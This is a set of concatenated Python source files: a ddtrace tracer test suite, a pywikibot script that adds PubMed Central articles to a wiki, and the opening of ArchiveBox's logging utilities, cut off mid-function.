name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=root,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_runtime_worker(self):
# by default runtime worker not started though runtime id is set
self.assertIsNone(self.tracer._runtime_worker)
# configure tracer with runtime metrics collection
self.tracer.configure(collect_metrics=True)
self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_url_host_port(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
tracer = Tracer()
writer = AgentWriter()
tracer.configure(writer=writer, dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
def test_configure_dogstatsd_url_socket(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
tracer = Tracer()
writer = AgentWriter()
tracer.configure(writer=writer, dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
def test_span_no_runtime_tags(self):
self.tracer.configure(collect_metrics=False)
with self.start_span("root") as root:
with self.start_span("child", child_of=root.context) as child:
pass
self.assertIsNone(root.get_tag("language"))
self.assertIsNone(child.get_tag("language"))
def test_only_root_span_runtime_internal_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("custom", "template", "web", "worker"):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") == "python"
assert child.get_tag("language") is None
def test_only_root_span_runtime_external_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in (
"algoliasearch.search",
"boto",
"cache",
"cassandra",
"elasticsearch",
"grpc",
"kombu",
"http",
"memcached",
"redis",
"sql",
"vertica",
):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") is None
assert child.get_tag("language") is None
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.agent_url == "http://localhost:8126"
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer.agent_url == "http://foobar:12"
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer.agent_url == "unix:///foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer.agent_url == "http://localhost:80"
t = ddtrace.Tracer(url="https://localhost")
assert t.writer.agent_url == "https://localhost:443"
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert str(e) == "Unknown scheme `https` for agent URL"
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
assert t.writer.is_alive()
t.shutdown()
t.writer.stop.assert_has_calls(
[
mock.call(timeout=None),
mock.call(timeout=None),
]
)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Stop should be called when replacing the writer.
t.configure(hostname="localhost", port=8126)
assert orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t.writer.dogstatsd.host == "localhost"
assert t.writer.dogstatsd.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer != original_writer
assert t.writer._buffer != original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 0
assert len(t.writer._buffer) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._buffer == original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 1
assert len(t.writer._buffer) == 1
def test_tracer_trace_across_fork():
"""
When a trace is started in a parent process and a child process is spawned
The trace should be continued in the child process
"""
tracer = Tracer()
tracer.writer = DummyWriter()
def task(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 1
(child,) = children
assert parent.trace_id == child["trace_id"]
assert child["parent_id"] == parent.span_id
def test_tracer_trace_across_multiple_forks():
"""
When a trace is started and crosses multiple process boundaries
The trace should be continued in the child processes
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Start a span in this process then start a child process which itself
# starts a span and spawns another child process which starts a span.
def task(tracer, q):
tracer.writer = DummyWriter()
def task2(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child2"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
with tracer.trace("child1"):
q2 = multiprocessing.Queue()
p = multiprocessing.Process(target=task2, args=(tracer, q2))
p.start()
p.join()
task2_spans = q2.get()
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id, span_id=s.span_id) for s in spans] + task2_spans)
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 2
child1, child2 = children
assert parent.trace_id == child1["trace_id"] == child2["trace_id"]
assert child1["parent_id"] == parent.span_id
assert child2["parent_id"] == child1["span_id"]
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env(self):
assert isinstance(self.tracer.original_writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
assert isinstance(self.tracer.original_writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters(tracer, test_spans):
class FilterAll(object):
def process_trace(self, trace):
return None
tracer.configure(
settings={
"FILTERS": [FilterAll()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
tracer.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit(tracer, test_spans):
s1 = tracer.trace("1")
s2 = tracer.trace("2")
s1.finish()
s2.finish()
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = tracer.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = tracer.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx(tracer, test_spans):
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.current_span() == s3
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s3.span_id
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.current_span() == s4
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s4.span_id
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = test_spans.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded(tracer, test_spans):
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = test_spans.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed(tracer, test_spans):
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
assert s1.parent_id is None
trace = test_spans.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s2
assert tracer.get_call_context().trace_id == s2.trace_id == 4321
assert tracer.get_call_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = test_spans.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop(tracer, test_spans):
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_service_mapping():
@contextlib.contextmanager
def override_service_mapping(service_mapping):
with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
assert ddtrace.config.service_mapping == {}
ddtrace.config.service_mapping = Config().service_mapping
yield
ddtrace.config.service_mapping = {}
# Test single mapping
with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "bar"
# Test multiple mappings
with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
assert span.service == "fu"
# Test colliding mappings
with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "foobar"
# Test invalid service mapping
with override_service_mapping("foo;bar,sna:fu"):
with ddtrace.Tracer().trace("passthru", service="foo") as _:
assert _.service == "foo"
with ddtrace.Tracer().trace("renaming", "sna") as _:
assert _.service == "fu"
def test_configure_url_partial():
tracer = ddtrace.Tracer()
tracer.configure(hostname="abc")
assert tracer.writer.agent_url == "http://abc:8126"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer = ddtrace.Tracer(url="http://abc")
assert tracer.writer.agent_url == "http://abc:80"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer.configure(port=431)
assert tracer.writer.agent_url == "http://abc:431"
|
addpapers.py
|
import queryCiteFile
import librarybase
import pywikibot
from epmclib.getPMCID import getPMCID
from epmclib.exceptions import IDNotResolvedException
import queue
import threading
import time
def rununthreaded():
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for idx, citation in enumerate(citations[10513:]):
addpaper(idx, citation)
def runthreaded():
threads = []
for i in range(10):
t = threading.Thread(target=worker())
t.start()
threads.append(t)
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for citation in enumerate(citations[10513:]):
q.put(citation)
q.join()
for i in range(10):
q.put(None)
for t in threads:
t.join()
def worker():
while True:
idx, citation = q.get()
addpaper( idx, citation )
q.task_done()
def addpaper( idx, citation ):
start=time.time()
print(citation)
if citation is None:
return
print('trying to add {} number {}'.format(citation[5], idx))
site = pywikibot.Site("librarybase", "librarybase")
item = librarybase.JournalArticlePage(site)
pmcidobj = getPMCID(citation[5])
try:
pmcidobj.getBBasicMetadata()
except IDNotResolvedException:
print('Couldn\'t find in EPMC:' + citation[5])
return
metadata = pmcidobj.metadata
print("Got metadata in:" + str(time.time()-start))
if not item.articleAlreadyExists(metadata['pmcid']):
print('Item doesn\'t seem to exist. Setting metadata for: ' + metadata['pmcid'])
item.setMetaData(metadata)
print("set metadata in" + str(time.time()-start))
else:
print("{} already exists. Doing nothing".format(metadata['pmcid']))
q=queue.Queue()
rununthreaded()
|
logging_util.py
|
__package__ = 'archivebox'
import re
import os
import sys
import stat
import time
import argparse
from math import log
from multiprocessing import Process
from pathlib import Path
from datetime import datetime, timezone
from dataclasses import dataclass
from typing import Any, Optional, List, Dict, Union, IO, TYPE_CHECKING
if TYPE_CHECKING:
from .index.schema import Link, ArchiveResult
from .system import get_dir_size
from .util import enforce_types
from .config import (
ConfigDict,
OUTPUT_DIR,
PYTHON_ENCODING,
VERSION,
ANSI,
IS_TTY,
IN_DOCKER,
TERM_WIDTH,
SHOW_PROGRESS,
SOURCES_DIR_NAME,
stderr,
)
@dataclass
class RuntimeStats:
"""mutable stats counter for logging archiving timing info to CLI output"""
skipped: int = 0
succeeded: int = 0
failed: int = 0
parse_start_ts: Optional[datetime] = None
parse_end_ts: Optional[datetime] = None
index_start_ts: Optional[datetime] = None
index_end_ts: Optional[datetime] = None
archiving_start_ts: Optional[datetime] = None
archiving_end_ts: Optional[datetime] = None
# globals are bad, mmkay
_LAST_RUN_STATS = RuntimeStats()
def debug_dict_summary(obj: Dict[Any, Any]) -> None:
stderr(' '.join(f'{key}={str(val).ljust(6)}' for key, val in obj.items()))
def get_fd_info(fd) -> Dict[str, Any]:
NAME = fd.name[1:-1]
FILENO = fd.fileno()
MODE = os.fstat(FILENO).st_mode
IS_TTY = hasattr(fd, 'isatty') and fd.isatty()
IS_PIPE = stat.S_ISFIFO(MODE)
IS_FILE = stat.S_ISREG(MODE)
IS_TERMINAL = not (IS_PIPE or IS_FILE)
IS_LINE_BUFFERED = fd.line_buffering
IS_READABLE = fd.readable()
return {
'NAME': NAME, 'FILENO': FILENO, 'MODE': MODE,
'IS_TTY': IS_TTY, 'IS_PIPE': IS_PIPE, 'IS_FILE': IS_FILE,
'IS_TERMINAL': IS_TERMINAL, 'IS_LINE_BUFFERED': IS_LINE_BUFFERED,
'IS_READABLE': IS_READABLE,
}
# # Log debug information about stdin, stdout, and stderr
# sys.stdout.write('[>&1] this is python stdout\n')
# sys.stderr.write('[>&2] this is python stderr\n')
# debug_dict_summary(get_fd_info(sys.stdin))
# debug_dict_summary(get_fd_info(sys.stdout))
# debug_dict_summary(get_fd_info(sys.stderr))
class SmartFormatter(argparse.HelpFormatter):
"""Patched formatter that prints newlines in argparse help strings"""
def _split_lines(self, text, width):
if '\n' in text:
return text.splitlines()
return argparse.HelpFormatter._split_lines(self, text, width)
def reject_stdin(caller: str, stdin: Optional[IO]=sys.stdin) -> None:
"""Tell the user they passed stdin to a command that doesn't accept it"""
if not stdin:
return None
if IN_DOCKER:
# when TTY is disabled in docker we cant tell if stdin is being piped in or not
# if we try to read stdin when its not piped we will hang indefinitely waiting for it
return None
if not stdin.isatty():
